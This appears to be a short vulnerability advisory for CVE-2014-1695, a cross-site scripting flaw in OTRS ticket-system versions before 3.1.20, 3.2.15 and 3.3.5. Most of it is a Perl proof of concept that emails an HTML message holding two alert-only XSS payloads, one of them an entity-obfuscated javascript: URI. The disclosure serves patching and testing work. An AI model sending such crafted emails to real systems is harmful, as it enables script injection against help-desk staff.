CVE-2014-1695Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.

Proof of Concept:

#!/usr/bin/perl -w
# OTRS XSS PoC
# (C) 2014 Adam Ziaja <[email protected]> http://adamziaja.com
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => '[email protected]',
    To => '[email protected]',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();
        

Adam Ziaja <adam@adamziaja.com>